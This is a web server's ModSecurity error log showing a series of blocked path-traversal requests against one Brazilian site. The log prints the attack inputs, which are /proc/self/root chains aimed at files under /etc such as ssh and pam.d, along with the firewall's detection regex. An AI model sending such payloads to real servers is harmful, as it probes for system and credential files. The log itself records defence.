[Tue Mar 17 09:00:48.619914 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:32824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCcAeiSKl8TjouI-b-EgAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:00:50.033084 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.243.203:46566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCcpDEJR9VXonE_-1J9gAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:00:51.248982 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.243.203:45262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCcxePVOt35XCGZP8ruwAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:00:53.578452 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.243.203:45278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCdJqmL8PQht4WJFlC-gAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:00:53.596607 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.46:46960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCdQeiSKl8TjouI-b-GAAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:55.986706 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.241.46:47244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCdwQohV2v-7oj5HH2xwAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:57.203754 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.243.203:45294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCeQQohV2v-7oj5HH2yQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:00:58.478928 2026] [:error] [pid 7000:tid 140411616036608] [client 74.7.243.203:45310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCehePVOt35XCGZP8rwAAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:01:02.079999 2026] [:error] [pid 7000:tid 140411624429312] [client 74.7.241.46:47260] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCfhePVOt35XCGZP8rxAAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:04.836327 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:45322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCf-82sZHvlq4xgHq_TAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:01:08.070218 2026] [:error] [pid 1961:tid 140411725141760] [client 74.7.241.46:47938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCg3RXaaWotPICgYsg_AAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:09.483007 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.241.46:56574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablChe82sZHvlq4xgHq_TQAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:15.255484 2026] [:error] [pid 7000:tid 140411741927168] [client 74.7.243.203:36896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCixePVOt35XCGZP8rzwAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:01:27.615419 2026] [:error] [pid 7000:tid 140411540502272] [client 74.7.241.46:56576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablClxePVOt35XCGZP8r3QAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:30.028470 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:35414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCmu82sZHvlq4xgHq_UwAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:01:31.330903 2026] [:error] [pid 1210:tid 140411574073088] [client 74.7.241.46:35428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCm1KJy4A1bGlmj9BRiwAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:35.047740 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.241.46:35436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCn5qmL8PQht4WJFlDEQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:01:51.511462 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:35448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCr1KJy4A1bGlmj9BRrwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:01:57.487888 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:43214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCte82sZHvlq4xgHq_YAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:01:59.814368 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:47120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCt9CmCSWTlPouqorHLwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:02:15.659281 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:46080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCx6BJNF7axNlVR0X5OQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
